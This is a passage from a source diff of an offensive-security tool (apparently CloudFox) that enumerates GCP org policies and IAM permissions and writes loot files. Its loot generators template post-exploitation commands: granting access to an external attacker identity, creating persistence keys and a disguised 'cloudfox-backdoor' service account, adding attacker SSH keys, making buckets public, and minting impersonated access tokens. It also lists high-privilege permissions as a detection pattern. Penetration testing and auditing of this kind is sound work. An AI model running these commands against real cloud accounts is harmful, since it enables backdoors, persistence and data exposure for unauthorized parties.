+ lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# CONSTRAINT: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n", + policy.Constraint, + policy.ProjectID, + ) + + if policy.Description != "" { + lootFile.Contents += fmt.Sprintf("# Description: %s\n", policy.Description) + } + + lootFile.Contents += fmt.Sprintf( + "# Enforced: %s, AllowAll: %s, DenyAll: %s, Inherit: %s\n", + shared.BoolToYesNo(policy.Enforced), + shared.BoolToYesNo(policy.AllowAll), + shared.BoolToYesNo(policy.DenyAll), + shared.BoolToYesNo(policy.InheritParent), + ) + + if len(policy.AllowedValues) > 0 { + lootFile.Contents += fmt.Sprintf("# Allowed Values: %s\n", strings.Join(policy.AllowedValues, ", ")) + } + if len(policy.DeniedValues) > 0 { + lootFile.Contents += fmt.Sprintf("# Denied Values: %s\n", strings.Join(policy.DeniedValues, ", ")) + } + + lootFile.Contents += fmt.Sprintf( + "\n# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe this policy:\n"+ + "gcloud org-policies describe %s --project=%s\n\n"+ + "# Get effective policy (includes inheritance):\n"+ + "gcloud org-policies describe %s --project=%s --effective\n\n"+ + "# List all constraints for this project:\n"+ + "gcloud org-policies list --project=%s\n\n", + constraintName, policy.ProjectID, + constraintName, policy.ProjectID, + policy.ProjectID, + ) + + // Exploit/bypass commands based on specific constraint types + lootFile.Contents += "# === EXPLOIT / BYPASS COMMANDS ===\n\n" + + switch constraintName { + case "iam.allowedPolicyMemberDomains": + if policy.AllowAll { + lootFile.Contents += "# [FINDING] Domain restriction is DISABLED (AllowAll) - any external identity can be granted access\n" + lootFile.Contents += fmt.Sprintf( + "# Grant access to external identity:\n"+ + "gcloud projects add-iam-policy-binding %s --member=user:attacker@external.com --role=roles/viewer\n\n", + policy.ProjectID, 
+ ) + } else if !policy.Enforced { + lootFile.Contents += "# [FINDING] Domain restriction is NOT ENFORCED\n\n" + } + + case "iam.disableServiceAccountKeyCreation": + if !policy.Enforced || policy.AllowAll { + lootFile.Contents += "# [FINDING] SA key creation is NOT restricted - create keys for persistence:\n" + lootFile.Contents += fmt.Sprintf( + "gcloud iam service-accounts keys create /tmp/sa-key.json --iam-account=SA_EMAIL@%s.iam.gserviceaccount.com\n\n", + policy.ProjectID, + ) + } else { + lootFile.Contents += "# SA key creation is restricted - try alternative persistence methods:\n" + + "# - Workload identity federation\n" + + "# - Service account impersonation chain\n\n" + } + + case "iam.disableServiceAccountCreation": + if !policy.Enforced || policy.AllowAll { + lootFile.Contents += "# [FINDING] SA creation is NOT restricted - create backdoor service accounts:\n" + lootFile.Contents += fmt.Sprintf( + "gcloud iam service-accounts create cloudfox-backdoor --display-name='System Service' --project=%s\n\n", + policy.ProjectID, + ) + } + + case "compute.requireShieldedVm": + if !policy.Enforced || policy.AllowAll { + lootFile.Contents += "# [FINDING] Shielded VM is NOT required - unshielded VMs can be created:\n" + + "# Boot integrity monitoring is not enforced\n\n" + } + + case "compute.requireOsLogin": + if !policy.Enforced || policy.AllowAll { + lootFile.Contents += "# [FINDING] OS Login is NOT required - SSH keys can be added to project/instance metadata:\n" + lootFile.Contents += fmt.Sprintf( + "# Add SSH key to project metadata:\n"+ + "gcloud compute project-info add-metadata --metadata=ssh-keys=\"attacker:ssh-rsa AAAA...\" --project=%s\n\n", + policy.ProjectID, + ) + } + + case "compute.vmExternalIpAccess": + if policy.AllowAll { + lootFile.Contents += "# [FINDING] External IP access is NOT restricted - VMs can have public IPs:\n" + + "# Any VM can be assigned a public IP for data exfiltration\n\n" + } + + case "storage.uniformBucketLevelAccess": + if 
!policy.Enforced || policy.AllowAll { + lootFile.Contents += "# [FINDING] Uniform bucket access is NOT enforced - ACLs can be used:\n" + + "# Fine-grained ACLs allow per-object permissions that are harder to audit\n\n" + } + + case "storage.publicAccessPrevention": + if !policy.Enforced || policy.AllowAll { + lootFile.Contents += "# [FINDING] Public access prevention is NOT enforced:\n" + lootFile.Contents += fmt.Sprintf( + "# Make a bucket publicly accessible:\n"+ + "gsutil iam ch allUsers:objectViewer gs://BUCKET_NAME\n"+ + "# Or set public ACL:\n"+ + "gsutil acl ch -u AllUsers:R gs://BUCKET_NAME/OBJECT\n\n", + ) + } + + case "sql.restrictPublicIp": + if !policy.Enforced || policy.AllowAll { + lootFile.Contents += "# [FINDING] Public IP restriction is NOT enforced on Cloud SQL:\n" + + "# SQL instances can be created with public IPs\n\n" + } + + case "sql.restrictAuthorizedNetworks": + if !policy.Enforced || policy.AllowAll { + lootFile.Contents += "# [FINDING] Authorized network restriction is NOT enforced:\n" + + "# 0.0.0.0/0 can be added to authorized networks\n\n" + } + + default: + if policy.AllowAll { + lootFile.Contents += fmt.Sprintf("# [FINDING] Policy %s has AllowAll - constraint is effectively disabled\n\n", constraintName) + } else if !policy.Enforced { + lootFile.Contents += fmt.Sprintf("# [FINDING] Policy %s is not enforced\n\n", constraintName) + } + } +} + +func (m *OrgPoliciesModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *OrgPoliciesModule) getHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Constraint", + "Description", + "Enforced", + "Allow All", + "Deny All", + "Inherit", + "Allowed Values", + "Denied Values", + } +} + +func (m *OrgPoliciesModule) policiesToTableBody(policies []orgpolicyservice.OrgPolicyInfo) [][]string { + var body [][]string + for _, 
policy := range policies { + description := policy.Description + if description == "" { + description = "-" + } + + allowedValues := "-" + if len(policy.AllowedValues) > 0 { + allowedValues = strings.Join(policy.AllowedValues, ", ") + } + + deniedValues := "-" + if len(policy.DeniedValues) > 0 { + deniedValues = strings.Join(policy.DeniedValues, ", ") + } + + body = append(body, []string{ + m.GetProjectName(policy.ProjectID), + policy.ProjectID, + policy.Constraint, + description, + shared.BoolToYesNo(policy.Enforced), + shared.BoolToYesNo(policy.AllowAll), + shared.BoolToYesNo(policy.DenyAll), + shared.BoolToYesNo(policy.InheritParent), + allowedValues, + deniedValues, + }) + } + return body +} + +func (m *OrgPoliciesModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + if policies, ok := m.ProjectPolicies[projectID]; ok && len(policies) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "orgpolicies", + Header: m.getHeader(), + Body: m.policiesToTableBody(policies), + }) + } + return tableFiles +} + +func (m *OrgPoliciesModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID := range m.ProjectPolicies { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = OrgPoliciesOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, 
m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_ORGPOLICIES_MODULE_NAME) + } +} + +func (m *OrgPoliciesModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allPolicies := m.getAllPolicies() + + var tables []internal.TableFile + if len(allPolicies) > 0 { + tables = append(tables, internal.TableFile{ + Name: "orgpolicies", + Header: m.getHeader(), + Body: m.policiesToTableBody(allPolicies), + }) + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := OrgPoliciesOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_ORGPOLICIES_MODULE_NAME) + } +} diff --git a/gcp/commands/permissions.go b/gcp/commands/permissions.go new file mode 100755 index 00000000..e40a14b5 --- /dev/null +++ b/gcp/commands/permissions.go @@ -0,0 +1,1359 @@ +package commands + +import ( + "context" + "fmt" + "sort" + "strings" + "sync" + + IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" + orgsservice "github.com/BishopFox/cloudfox/gcp/services/organizationsService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPPermissionsCommand = &cobra.Command{ + Use: globals.GCP_PERMISSIONS_MODULE_NAME, + 
// highPrivilegePermissionPrefixes lists permission-name prefixes that the
// module flags as high-privilege. Matching is prefix-based (see
// isHighPrivilegePermission), so e.g. "iam.roles.update" also matches
// "iam.roles.updateX"-style names. These cover token minting, key creation,
// setIamPolicy at every hierarchy level, and metadata/service-account writes.
var highPrivilegePermissionPrefixes = []string{
	"iam.serviceAccounts.actAs",
	"iam.serviceAccounts.getAccessToken",
	"iam.serviceAccounts.getOpenIdToken",
	"iam.serviceAccounts.implicitDelegation",
	"iam.serviceAccounts.signBlob",
	"iam.serviceAccounts.signJwt",
	"iam.serviceAccountKeys.create",
	"iam.roles.create",
	"iam.roles.update",
	"resourcemanager.projects.setIamPolicy",
	"resourcemanager.folders.setIamPolicy",
	"resourcemanager.organizations.setIamPolicy",
	"compute.instances.setMetadata",
	"compute.instances.setServiceAccount",
	"compute.projects.setCommonInstanceMetadata",
	"storage.buckets.setIamPolicy",
	"storage.objects.setIamPolicy",
	"cloudfunctions.functions.setIamPolicy",
	"run.services.setIamPolicy",
	"secretmanager.secrets.setIamPolicy",
	"deploymentmanager.deployments.create",
	"cloudbuild.builds.create",
	"container.clusters.getCredentials",
	"orgpolicy.policy.set",
}

// ExplodedPermission represents a single permission entry with full context:
// one (entity, permission, scope) tuple, i.e. one row of the output table.
type ExplodedPermission struct {
	Entity            string // IAM entity identifier as returned by the IAM service
	EntityType        string // entity kind; "ServiceAccount" triggers SA-specific handling
	EntityEmail       string // entity email (used for SA loot and cross-project detection)
	Permission        string // individual permission exploded out of the role
	Role              string // the role the permission came from
	RoleType          string // role classification from the IAM service (predefined/custom etc. — TODO confirm values)
	ResourceScope     string // "type/id" composite of the binding scope
	ResourceScopeType string // "organization", "folder", or "project" (anything else treated as project)
	ResourceScopeID   string // ID of the org/folder/project the binding is attached to
	ResourceScopeName string // human-readable name for the scope (see getScopeName)
	InheritedFrom     string // ancestor resource the binding was inherited from, if any
	IsInherited       bool   // true when the binding comes from an ancestor scope
	HasCondition      bool   // true when the binding carries an IAM condition
	Condition         string // raw condition string from the binding
	ConditionTitle    string // best-effort title parsed from Condition (see parseConditionTitle)
	EffectiveProject  string // project being enumerated when this entry was produced
	ProjectName       string // display name of EffectiveProject
	IsCrossProject    bool   // true when a service account from another project holds this permission
	SourceProject     string // home project of the cross-project service account
	IsHighPrivilege   bool   // true when Permission matches highPrivilegePermissionPrefixes
}

// ------------------------------
// Module Struct with embedded BaseGCPModule
// ------------------------------
type PermissionsModule struct {
	gcpinternal.BaseGCPModule

	// Module-specific fields - now per-project for hierarchical output
	ProjectPerms      map[string][]ExplodedPermission // projectID -> permissions
	OrgPerms          map[string][]ExplodedPermission // orgID -> org-level permissions
	FolderPerms       map[string][]ExplodedPermission // folderID -> folder-level permissions
	EntityPermissions []IAMService.EntityPermissions  // Legacy: aggregated for stats
	GroupInfos        []IAMService.GroupInfo          // Legacy: aggregated for stats
	OrgBindings       []IAMService.PolicyBinding      // org-level bindings
	FolderBindings    map[string][]IAMService.PolicyBinding // folder-level bindings

	// Per-scope loot files for inheritance-aware output
	OrgLoot     map[string]*internal.LootFile // orgID -> loot commands for org-level bindings
	FolderLoot  map[string]*internal.LootFile // folderID -> loot commands for folder-level bindings
	ProjectLoot map[string]*internal.LootFile // projectID -> loot commands for project-level bindings
	EnumLoot    *internal.LootFile            // permissions-enumeration loot file

	OrgCache *gcpinternal.OrgCache // OrgCache for hierarchy lookups
	mu       sync.Mutex            // guards all maps/slices above during concurrent project processing

	// Organization info for output path
	OrgIDs   []string
	OrgNames map[string]string // orgID -> display name (falls back to the ID)
}

// ------------------------------
// Output Struct implementing CloudfoxOutput interface
// ------------------------------
type PermissionsOutput struct {
	Table []internal.TableFile
	Loot  []internal.LootFile
}
[]internal.LootFile +} + +func (o PermissionsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o PermissionsOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPPermissionsCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_PERMISSIONS_MODULE_NAME) + if err != nil { + return + } + + module := &PermissionsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectPerms: make(map[string][]ExplodedPermission), + OrgPerms: make(map[string][]ExplodedPermission), + FolderPerms: make(map[string][]ExplodedPermission), + EntityPermissions: []IAMService.EntityPermissions{}, + GroupInfos: []IAMService.GroupInfo{}, + OrgBindings: []IAMService.PolicyBinding{}, + FolderBindings: make(map[string][]IAMService.PolicyBinding), + OrgLoot: make(map[string]*internal.LootFile), + FolderLoot: make(map[string]*internal.LootFile), + ProjectLoot: make(map[string]*internal.LootFile), + OrgIDs: []string{}, + OrgNames: make(map[string]string), + EnumLoot: &internal.LootFile{Name: "permissions-enumeration", Contents: ""}, + } + + // Initialize enumeration loot file + module.initializeEnumerationLoot() + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *PermissionsModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Enumerating ALL permissions with full inheritance explosion...", globals.GCP_PERMISSIONS_MODULE_NAME) + logger.InfoM("This includes organization, folder, and project-level bindings", globals.GCP_PERMISSIONS_MODULE_NAME) + + // Get OrgCache for hierarchy lookups (used for inheritance-aware routing) + m.OrgCache = gcpinternal.GetOrgCacheFromContext(ctx) + + // First, try to enumerate organization-level bindings + m.enumerateOrganizationBindings(ctx, logger) 
+ + // Run project enumeration with concurrency + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_PERMISSIONS_MODULE_NAME, m.processProject) + + // Get all permissions for stats + allPerms := m.getAllExplodedPerms() + if len(allPerms) == 0 { + logger.InfoM("No permissions found", globals.GCP_PERMISSIONS_MODULE_NAME) + return + } + + // Count statistics + uniqueEntities := make(map[string]bool) + uniquePerms := make(map[string]bool) + inheritedCount := 0 + crossProjectCount := 0 + highPrivCount := 0 + + for _, ep := range allPerms { + uniqueEntities[ep.Entity] = true + uniquePerms[ep.Permission] = true + if ep.IsInherited { + inheritedCount++ + } + if ep.IsCrossProject { + crossProjectCount++ + } + if ep.IsHighPrivilege { + highPrivCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Exploded %d total permission entries for %d entities", + len(allPerms), len(uniqueEntities)), globals.GCP_PERMISSIONS_MODULE_NAME) + logger.InfoM(fmt.Sprintf("Unique permissions: %d | Inherited: %d | Cross-project: %d | High-privilege: %d", + len(uniquePerms), inheritedCount, crossProjectCount, highPrivCount), globals.GCP_PERMISSIONS_MODULE_NAME) + + if len(m.GroupInfos) > 0 { + groupsEnumerated := 0 + for _, gi := range m.GroupInfos { + if gi.MembershipEnumerated { + groupsEnumerated++ + } + } + logger.InfoM(fmt.Sprintf("Found %d group(s), enumerated membership for %d", len(m.GroupInfos), groupsEnumerated), globals.GCP_PERMISSIONS_MODULE_NAME) + + unenumeratedGroups := len(m.GroupInfos) - groupsEnumerated + if unenumeratedGroups > 0 { + logger.InfoM(fmt.Sprintf("[WARNING] Could not enumerate membership for %d group(s) - permissions inherited via these groups are NOT visible!", unenumeratedGroups), globals.GCP_PERMISSIONS_MODULE_NAME) + } + } + + // Generate enumeration loot after all projects are processed + m.generateEnumerationLoot() + + m.writeOutput(ctx, logger) +} + +// getAllExplodedPerms returns all permissions from all scopes (for statistics) +func (m 
*PermissionsModule) getAllExplodedPerms() []ExplodedPermission { + var all []ExplodedPermission + for _, perms := range m.OrgPerms { + all = append(all, perms...) + } + for _, perms := range m.FolderPerms { + all = append(all, perms...) + } + for _, perms := range m.ProjectPerms { + all = append(all, perms...) + } + return all +} + +// enumerateOrganizationBindings tries to get organization-level IAM bindings +func (m *PermissionsModule) enumerateOrganizationBindings(ctx context.Context, logger internal.Logger) { + orgsSvc := orgsservice.New() + + // Get org display names mapping (orgID -> displayName) + orgDisplayNames := make(map[string]string) + orgs, err := orgsSvc.SearchOrganizations() + if err == nil { + for _, org := range orgs { + // org.Name is "organizations/ORGID", extract just the ID + orgID := strings.TrimPrefix(org.Name, "organizations/") + orgDisplayNames[orgID] = org.DisplayName + } + } + + if len(m.ProjectIDs) > 0 { + iamSvc := IAMService.New() + + bindings, err := iamSvc.PoliciesWithInheritance(m.ProjectIDs[0]) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Could not get inherited policies: %v", err), globals.GCP_PERMISSIONS_MODULE_NAME) + } + return + } + + for _, binding := range bindings { + if binding.ResourceType == "organization" { + m.mu.Lock() + m.OrgBindings = append(m.OrgBindings, binding) + // Track org IDs + if !contains(m.OrgIDs, binding.ResourceID) { + m.OrgIDs = append(m.OrgIDs, binding.ResourceID) + // Use display name if available, otherwise fall back to ID + if displayName, ok := orgDisplayNames[binding.ResourceID]; ok && displayName != "" { + m.OrgNames[binding.ResourceID] = displayName + } else { + m.OrgNames[binding.ResourceID] = binding.ResourceID + } + } + m.mu.Unlock() + } else if binding.ResourceType == "folder" { + m.mu.Lock() + m.FolderBindings[binding.ResourceID] = append(m.FolderBindings[binding.ResourceID], binding) + m.mu.Unlock() + } + } + + if 
// contains reports whether item is present in slice.
func contains(slice []string, item string) bool {
	for i := range slice {
		if slice[i] == item {
			return true
		}
	}
	return false
}
// ------------------------------
// Project Processor (called concurrently for each project)
// ------------------------------
// processProject enumerates every IAM entity's permissions for one project,
// explodes each role into individual permissions, and routes each exploded
// entry to org-, folder-, or project-level storage based on the binding's
// resource type. It runs concurrently via RunProjectEnumeration, so all
// writes to module state happen under m.mu.
func (m *PermissionsModule) processProject(ctx context.Context, projectID string, logger internal.Logger) {
	if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS {
		logger.InfoM(fmt.Sprintf("Enumerating permissions in project: %s", projectID), globals.GCP_PERMISSIONS_MODULE_NAME)
	}

	iamService := IAMService.New()
	entityPerms, groupInfos, err := iamService.GetAllEntityPermissionsWithGroupExpansion(projectID)
	if err != nil {
		m.CommandCounter.Error++
		gcpinternal.HandleGCPError(err, logger, globals.GCP_PERMISSIONS_MODULE_NAME,
			fmt.Sprintf("Could not enumerate permissions in project %s", projectID))
		return
	}

	// Accumulate locally first; module state is only touched under the lock.
	var projectPerms []ExplodedPermission
	var orgPerms []ExplodedPermission
	var folderPerms []ExplodedPermission

	for _, ep := range entityPerms {
		for _, perm := range ep.Permissions {
			isHighPriv := isHighPrivilegePermission(perm.Permission)

			exploded := ExplodedPermission{
				Entity:            ep.Entity,
				EntityType:        ep.EntityType,
				EntityEmail:       ep.Email,
				Permission:        perm.Permission,
				Role:              perm.Role,
				RoleType:          perm.RoleType,
				ResourceScope:     fmt.Sprintf("%s/%s", perm.ResourceType, perm.ResourceID),
				ResourceScopeType: perm.ResourceType,
				ResourceScopeID:   perm.ResourceID,
				ResourceScopeName: m.getScopeName(perm.ResourceType, perm.ResourceID),
				IsInherited:       perm.IsInherited,
				InheritedFrom:     perm.InheritedFrom,
				HasCondition:      perm.HasCondition,
				Condition:         perm.Condition,
				EffectiveProject:  projectID,
				ProjectName:       m.GetProjectName(projectID),
				IsHighPrivilege:   isHighPriv,
			}

			// Parse condition title if present (best-effort string parse).
			if perm.HasCondition && perm.Condition != "" {
				exploded.ConditionTitle = parseConditionTitle(perm.Condition)
			}

			// Detect cross-project access: a service account whose home
			// project differs from the project being enumerated.
			if ep.EntityType == "ServiceAccount" {
				saProject := extractProjectFromPrincipal(ep.Email, m.OrgCache)
				if saProject != "" && saProject != projectID {
					exploded.IsCrossProject = true
					exploded.SourceProject = saProject
				}
			}

			// Route to appropriate scope: org, folder, or project
			// (anything unrecognized is treated as project-scoped).
			switch perm.ResourceType {
			case "organization":
				orgPerms = append(orgPerms, exploded)
			case "folder":
				folderPerms = append(folderPerms, exploded)
			default:
				projectPerms = append(projectPerms, exploded)
			}
		}
	}

	m.mu.Lock()
	// Store per-project permissions
	m.ProjectPerms[projectID] = append(m.ProjectPerms[projectID], projectPerms...)

	// Store org-level permissions (keyed by org ID)
	for _, ep := range orgPerms {
		m.OrgPerms[ep.ResourceScopeID] = append(m.OrgPerms[ep.ResourceScopeID], ep)
	}

	// Store folder-level permissions (keyed by folder ID)
	for _, ep := range folderPerms {
		m.FolderPerms[ep.ResourceScopeID] = append(m.FolderPerms[ep.ResourceScopeID], ep)
	}

	// Legacy aggregated fields for stats
	m.EntityPermissions = append(m.EntityPermissions, entityPerms...)
	m.GroupInfos = append(m.GroupInfos, groupInfos...)

	// Generate loot per-scope based on exploded permissions.
	// The dedup sets are per-invocation, so each service account is written
	// at most once per scope per project processed.
	addedSAsOrg := make(map[string]map[string]bool)     // orgID -> email -> added
	addedSAsFolder := make(map[string]map[string]bool)  // folderID -> email -> added
	addedSAsProject := make(map[string]map[string]bool) // projectID -> email -> added

	// NOTE(review): allPerms may alias projectPerms' backing array via append;
	// safe here because it is only read below.
	allPerms := append(append(projectPerms, orgPerms...), folderPerms...)
	for _, ep := range allPerms {
		if ep.EntityType != "ServiceAccount" {
			continue
		}
		m.addPermissionToLoot(ep, addedSAsOrg, addedSAsFolder, addedSAsProject)
	}
	m.mu.Unlock()

	if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS {
		logger.InfoM(fmt.Sprintf("Exploded %d permission entries in project %s", len(projectPerms), projectID), globals.GCP_PERMISSIONS_MODULE_NAME)
	}
}

// getScopeName resolves a human-readable name for a scope ID: cached project
// names for projects, display names captured by enumerateOrganizationBindings
// for orgs, and the raw ID for folders (name lookup not implemented yet).
func (m *PermissionsModule) getScopeName(scopeType, scopeID string) string {
	switch scopeType {
	case "project":
		return m.GetProjectName(scopeID)
	case "organization":
		if name, ok := m.OrgNames[scopeID]; ok {
			return name
		}
		return scopeID
	case "folder":
		return scopeID // Could be enhanced to lookup folder names
	default:
		return scopeID
	}
}
// parseConditionTitle makes a best-effort attempt to pull the "title:" field
// out of a condition's string representation. It returns the first
// whitespace-delimited token after the first "title:" marker, or "" when no
// marker is present.
func parseConditionTitle(condition string) string {
	if !strings.Contains(condition, "title:") {
		return ""
	}
	// Split on every "title:" occurrence; the text between the first and
	// second markers (or the remainder) is parts[1].
	parts := strings.Split(condition, "title:")
	title := strings.TrimSpace(parts[1])
	if space := strings.Index(title, " "); space > 0 {
		return title[:space]
	}
	return title
}
+func (m *PermissionsModule) addPermissionToLoot(ep ExplodedPermission, + addedSAsOrg map[string]map[string]bool, + addedSAsFolder map[string]map[string]bool, + addedSAsProject map[string]map[string]bool) { + + if ep.EntityType != "ServiceAccount" { + return + } + + scopeType := ep.ResourceScopeType + scopeID := ep.ResourceScopeID + email := ep.EntityEmail + + // Determine which loot file and tracking map to use + var lootFile *internal.LootFile + var addedSet map[string]bool + + switch scopeType { + case "organization": + if m.OrgLoot[scopeID] == nil { + m.OrgLoot[scopeID] = &internal.LootFile{ + Name: "permissions-commands", + Contents: "# GCP Permissions Commands (Organization Level)\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + lootFile = m.OrgLoot[scopeID] + if addedSAsOrg[scopeID] == nil { + addedSAsOrg[scopeID] = make(map[string]bool) + } + addedSet = addedSAsOrg[scopeID] + + case "folder": + if m.FolderLoot[scopeID] == nil { + m.FolderLoot[scopeID] = &internal.LootFile{ + Name: "permissions-commands", + Contents: "# GCP Permissions Commands (Folder Level)\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + lootFile = m.FolderLoot[scopeID] + if addedSAsFolder[scopeID] == nil { + addedSAsFolder[scopeID] = make(map[string]bool) + } + addedSet = addedSAsFolder[scopeID] + + default: // project + if m.ProjectLoot[scopeID] == nil { + m.ProjectLoot[scopeID] = &internal.LootFile{ + Name: "permissions-commands", + Contents: "# GCP Permissions Commands (Project Level)\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + lootFile = m.ProjectLoot[scopeID] + if addedSAsProject[scopeID] == nil { + addedSAsProject[scopeID] = make(map[string]bool) + } + addedSet = addedSAsProject[scopeID] + } + + // Skip if already added to this scope + if addedSet[email] { + return + } + addedSet[email] = true + + // Extract project from SA email for commands + saProject := 
ep.EffectiveProject + if saProject == "" { + // Try to extract from email + parts := strings.Split(email, "@") + if len(parts) == 2 { + saParts := strings.Split(parts[1], ".") + if len(saParts) >= 1 { + saProject = saParts[0] + } + } + } + + // Add service account commands + highPriv := "" + if ep.IsHighPrivilege { + highPriv = " [HIGH PRIVILEGE]" + } + + lootFile.Contents += fmt.Sprintf( + "# Service Account: %s%s\n"+ + "# Role: %s (at %s/%s)\n", + email, highPriv, + ep.Role, scopeType, scopeID, + ) + + lootFile.Contents += fmt.Sprintf( + "gcloud iam service-accounts describe %s --project=%s\n"+ + "gcloud iam service-accounts keys list --iam-account=%s --project=%s\n"+ + "gcloud iam service-accounts get-iam-policy %s --project=%s\n"+ + "gcloud iam service-accounts keys create ./key.json --iam-account=%s --project=%s\n"+ + "gcloud auth print-access-token --impersonate-service-account=%s\n\n", + email, saProject, + email, saProject, + email, saProject, + email, saProject, + email, + ) +} + +// isHighPrivilegePermission checks if a permission is considered high-privilege +func isHighPrivilegePermission(permission string) bool { + for _, prefix := range highPrivilegePermissionPrefixes { + if strings.HasPrefix(permission, prefix) { + return true + } + } + return false +} + +// initializeEnumerationLoot initializes the enumeration loot file +func (m *PermissionsModule) initializeEnumerationLoot() { + m.EnumLoot.Contents = "# GCP Permissions Enumeration Commands\n" + m.EnumLoot.Contents += "# Generated by CloudFox\n" + m.EnumLoot.Contents += "# WARNING: Only use with proper authorization\n\n" +} + +// collectAllLootFiles collects all loot files for org-level output (all scopes combined) +func (m *PermissionsModule) collectAllLootFiles() []internal.LootFile { + var lootFiles []internal.LootFile + + // Combine all org, folder, and project loot into one file for org-level output + combinedLoot := &internal.LootFile{ + Name: "permissions-commands", + Contents: "# GCP 
Permissions Commands (All Scopes)\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + + // Add org-level loot + for orgID, loot := range m.OrgLoot { + if loot != nil && loot.Contents != "" { + combinedLoot.Contents += fmt.Sprintf("# === Organization: %s ===\n", orgID) + // Skip the header line from the individual loot + lines := strings.Split(loot.Contents, "\n") + for i, line := range lines { + if i >= 2 { // Skip first 2 header lines + combinedLoot.Contents += line + "\n" + } + } + } + } + + // Add folder-level loot + for folderID, loot := range m.FolderLoot { + if loot != nil && loot.Contents != "" { + combinedLoot.Contents += fmt.Sprintf("# === Folder: %s ===\n", folderID) + lines := strings.Split(loot.Contents, "\n") + for i, line := range lines { + if i >= 2 { + combinedLoot.Contents += line + "\n" + } + } + } + } + + // Add project-level loot + for projectID, loot := range m.ProjectLoot { + if loot != nil && loot.Contents != "" { + combinedLoot.Contents += fmt.Sprintf("# === Project: %s ===\n", projectID) + lines := strings.Split(loot.Contents, "\n") + for i, line := range lines { + if i >= 2 { + combinedLoot.Contents += line + "\n" + } + } + } + } + + // Only add if there's actual content beyond the header + if len(combinedLoot.Contents) > 60 { // More than just the header + lootFiles = append(lootFiles, *combinedLoot) + } + + // Add enumeration loot file + if m.EnumLoot != nil && m.EnumLoot.Contents != "" { + lootFiles = append(lootFiles, *m.EnumLoot) + } + + return lootFiles +} + +// collectLootFilesForProject collects loot files for a specific project with inheritance. 
+// This includes: org-level loot + ancestor folder loot + project-level loot +func (m *PermissionsModule) collectLootFilesForProject(projectID string) []internal.LootFile { + var lootFiles []internal.LootFile + + combinedLoot := &internal.LootFile{ + Name: "permissions-commands", + Contents: "# GCP Permissions Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + + // Get ancestry for this project + var projectOrgID string + var ancestorFolders []string + if m.OrgCache != nil && m.OrgCache.IsPopulated() { + projectOrgID = m.OrgCache.GetProjectOrgID(projectID) + ancestorFolders = m.OrgCache.GetProjectAncestorFolders(projectID) + } + + // Add org-level loot if this project belongs to an org + if projectOrgID != "" { + if loot, ok := m.OrgLoot[projectOrgID]; ok && loot != nil && loot.Contents != "" { + combinedLoot.Contents += fmt.Sprintf("# === Inherited from Organization: %s ===\n", projectOrgID) + lines := strings.Split(loot.Contents, "\n") + for i, line := range lines { + if i >= 2 { + combinedLoot.Contents += line + "\n" + } + } + } + } + + // Add folder-level loot for ancestor folders (in order from org to project) + // Reverse the slice to go from org-level folders to project-level folders + for i := len(ancestorFolders) - 1; i >= 0; i-- { + folderID := ancestorFolders[i] + if loot, ok := m.FolderLoot[folderID]; 